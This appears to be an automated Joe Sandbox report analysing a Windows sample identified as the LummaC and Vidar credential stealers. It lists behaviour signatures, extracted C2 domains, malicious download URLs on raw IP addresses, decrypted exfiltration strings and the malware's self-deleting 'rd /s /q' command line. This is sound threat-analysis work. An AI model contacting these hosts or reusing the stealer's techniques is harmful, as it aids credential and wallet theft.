Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1501434
MD5:5095864caf019967467c5714897ee419
SHA1:17e649d5784db18d790c77bdd300b9ff73dbf5ea
SHA256:26047c08e200668e57088cb5b9577ed7975bf6309db51fe3544c54878430e8a3
Tags:exe
Infos:

Detection

LummaC, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5356 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5095864CAF019967467C5714897EE419)
    • conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 4960 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • KKJEBAAECB.exe (PID: 3624 cmdline: "C:\ProgramData\KKJEBAAECB.exe" MD5: 087F21847D13D50158683C834471728C)
        • conhost.exe (PID: 1076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 5480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 2212 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • WerFault.exe (PID: 5228 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1760 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • KJKJJJECFI.exe (PID: 5788 cmdline: "C:\ProgramData\KJKJJJECFI.exe" MD5: 70567FAE269796BF407322D0A4435054)
        • conhost.exe (PID: 1236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 2896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 7116 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJECFIECBGDG" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 6096 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["traineiwnqo.shop", "caffegclasiqwp.shop", "awwardwiqi.shop", "stamppreewntnq.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "condedqpwqm.shop", "locatedblsoqp.shop", "stagedchheiqwo.shop"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199761128941"], "Botnet": "4384b1ceb77dcf470b759bedd7bb140b"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
          • 0x1e220:$s1: JohnDoe
          • 0x1e228:$s2: HAL9TH
          Process Memory Space: file.exe PID: 5356JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.2.RegAsm.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
            • 0x1ca20:$s1: JohnDoe
            • 0x1ca28:$s2: HAL9TH
            2.2.RegAsm.exe.400000.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              2.2.RegAsm.exe.400000.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
              • 0x1e220:$s1: JohnDoe
              • 0x1e228:$s2: HAL9TH
              2.2.RegAsm.exe.400000.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                2.2.RegAsm.exe.400000.1.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                • 0x1ca20:$s1: JohnDoe
                • 0x1ca28:$s2: HAL9TH
                Click to see the 4 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                Timestamp:2024-08-29T22:52:39.429665+0200
                SID:2055493
                Severity:1
                Source Port:49743
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-29T22:52:37.402398+0200
                SID:2803304
                Severity:3
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-29T22:53:04.539187+0200
                SID:2044247
                Severity:1
                Source Port:80
                Destination Port:49751
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-29T22:52:35.838282+0200
                SID:2803304
                Severity:3
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-29T22:52:40.814775+0200
                SID:2049812
                Severity:1
                Source Port:49745
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-29T22:52:40.814775+0200
                SID:2054653
                Severity:1
                Source Port:49745
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-29T22:52:37.972831+0200
                SID:2055479
                Severity:1
                Source Port:55775
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-29T22:52:37.104391+0200
                SID:2055576
                Severity:1
                Source Port:49741
                Destination Port:443
                Protocol:TCP
                Classtype:Domain Observed Used for C2 Detected
                Timestamp:2024-08-29T22:52:37.966810+0200
                SID:2049836
                Severity:1
                Source Port:49741
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-29T22:52:37.966810+0200
                SID:2054653
                Severity:1
                Source Port:49741
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-29T22:52:20.001776+0200
                SID:2051831
                Severity:1
                Source Port:80
                Destination Port:49739
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-29T22:52:40.804435+0200
                SID:2054495
                Severity:1
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-29T22:52:38.454050+0200
                SID:2055489
                Severity:1
                Source Port:49742
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-29T22:52:18.234088+0200
                SID:2049087
                Severity:1
                Source Port:49739
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-29T22:52:36.606887+0200
                SID:2055575
                Severity:1
                Source Port:56576
                Destination Port:53
                Protocol:UDP
                Classtype:Domain Observed Used for C2 Detected
                Timestamp:2024-08-29T22:52:38.932371+0200
                SID:2049836
                Severity:1
                Source Port:49742
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-29T22:52:38.932371+0200
                SID:2054653
                Severity:1
                Source Port:49742
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-29T22:52:40.279529+0200
                SID:2055493
                Severity:1
                Source Port:49745
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-29T22:53:05.339057+0200
                SID:2051831
                Severity:1
                Source Port:80
                Destination Port:49751
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-29T22:52:18.971347+0200
                SID:2044247
                Severity:1
                Source Port:80
                Destination Port:49739
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-29T22:52:38.934043+0200
                SID:2055483
                Severity:1
                Source Port:64147
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-29T22:52:39.563642+0200
                SID:2049836
                Severity:1
                Source Port:49743
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-29T22:52:39.563642+0200
                SID:2054653
                Severity:1
                Source Port:49743
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: condedqpwqm.shopAvira URL Cloud: Label: phishing
                Source: https://steamcommunity.com/profiles/76561199761128941Avira URL Cloud: Label: malware
                Source: http://147.45.68.138/nss3.dllAvira URL Cloud: Label: malware
                Source: http://147.45.68.138/sql.dllAvira URL Cloud: Label: malware
                Source: https://t.me/iyigunlAvira URL Cloud: Label: malware
                Source: http://147.45.68.138/softokn3.dllAvira URL Cloud: Label: malware
                Source: stagedchheiqwo.shopAvira URL Cloud: Label: phishing
                Source: https://locatedblsoqp.shop/apiAvira URL Cloud: Label: phishing
                Source: stamppreewntnq.shopAvira URL Cloud: Label: phishing
                Source: http://147.45.68.138/msvcp140.dllAvira URL Cloud: Label: malware
                Source: https://awwardwiqi.shop/apiAvira URL Cloud: Label: malware
                Source: http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exeAvira URL Cloud: Label: malware
                Source: http://147.45.68.138/vcruntime140.dllAvira URL Cloud: Label: malware
                Source: http://147.45.68.138/msvcp140.dll?Avira URL Cloud: Label: malware
                Source: https://traineiwnqo.shop/apibuAvira URL Cloud: Label: malware
                Source: http://147.45.68.138/mozglue.dllAvira URL Cloud: Label: malware
                Source: locatedblsoqp.shopAvira URL Cloud: Label: phishing
                Source: caffegclasiqwp.shopAvira URL Cloud: Label: malware
                Source: millyscroqwp.shopAvira URL Cloud: Label: malware
                Source: https://traineiwnqo.shop/apiAvira URL Cloud: Label: malware
                Source: https://traineiwnqo.shop/Avira URL Cloud: Label: malware
                Source: http://147.45.68.138/freebl3.dllAvira URL Cloud: Label: malware
                Source: traineiwnqo.shopAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199761128941"], "Botnet": "4384b1ceb77dcf470b759bedd7bb140b"}
                Source: 9.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["traineiwnqo.shop", "caffegclasiqwp.shop", "awwardwiqi.shop", "stamppreewntnq.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "condedqpwqm.shop", "locatedblsoqp.shop", "stagedchheiqwo.shop"], "Build id": "H8NgCl--"}
                Multi AV Scanner detection for dropped file
                Source: C:\ProgramData\KJKJJJECFI.exeReversingLabs: Detection: 34%
                Source: C:\ProgramData\KKJEBAAECB.exeReversingLabs: Detection: 34%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd8fb6f7b_lgjfd[1].exeReversingLabs: Detection: 34%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd9a65b5d_vqwergf[1].exeReversingLabs: Detection: 34%
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 34%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Sample uses string decryption to hide its real strings
                Source: 9.2.RegAsm.exe.400000.0.unpackString decryptor: caffegclasiqwp.shop
                Source: 9.2.RegAsm.exe.400000.0.unpackString decryptor: stamppreewntnq.shop
                Source: 9.2.RegAsm.exe.400000.0.unpackString decryptor: stagedchheiqwo.shop
                Source: 9.2.RegAsm.exe.400000.0.unpackString decryptor: millyscroqwp.shop
                Source: 9.2.RegAsm.exe.400000.0.unpackString decryptor: evoliutwoqm.shop
                Source: 9.2.RegAsm.exe.400000.0.unpackString decryptor: condedqpwqm.shop
                Source: 9.2.RegAsm.exe.400000.0.unpackString decryptor: traineiwnqo.shop
                Source: 9.2.RegAsm.exe.400000.0.unpackString decryptor: locatedblsoqp.shop
                Source: 9.2.RegAsm.exe.400000.0.unpackString decryptor: awwardwiqi.shop
                Source: 9.2.RegAsm.exe.400000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
                Source: 9.2.RegAsm.exe.400000.0.unpackString decryptor: TeslaBrowser/5.5
                Source: 9.2.RegAsm.exe.400000.0.unpackString decryptor: - Screen Resoluton:
                Source: 9.2.RegAsm.exe.400000.0.unpackString decryptor: - Physical Installed Memory:
                Source: 9.2.RegAsm.exe.400000.0.unpackString decryptor: Workgroup: -
                Source: 9.2.RegAsm.exe.400000.0.unpackString decryptor: H8NgCl--
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406AB6 CryptUnprotectData,LocalAlloc,LocalFree,2_2_00406AB6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F8D5 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,2_2_0040F8D5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406A53 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00406A53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004083FA memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,PK11_FreeSlot,lstrcatA,2_2_004083FA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,2_2_6C0D6C80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C22A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,2_2_6C22A9A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1F4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,2_2_6C1F4420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C224440 PK11_PrivDecrypt,2_2_6C224440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2244C0 PK11_PubEncrypt,2_2_6C2244C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2725B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,2_2_6C2725B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C208670 PK11_ExportEncryptedPrivKeyInfo,2_2_6C208670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C22A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,2_2_6C22A650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C20E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,2_2_6C20E6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C24A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,2_2_6C24A730
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
                Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
                Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
                Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                Source: Binary string: c:\rje\tg\h2r2\obj\Re\ease\etf.pdb source: file.exe
                Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.2148380649.0000000035593000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.2142626224.00000000296BC000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2385875761.000000001DB7B000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr
                Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
                Source: Binary string: c:\rje\tg\obj\Re\ease\etf.pdb source: KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00413540 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_00413540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B969 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B969
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041425C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_0041425C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00413B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00413B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409B68 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00409B68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040AB08 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040AB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409317 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409317
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_004013B4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409645 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409645
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A2C1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040A2C1
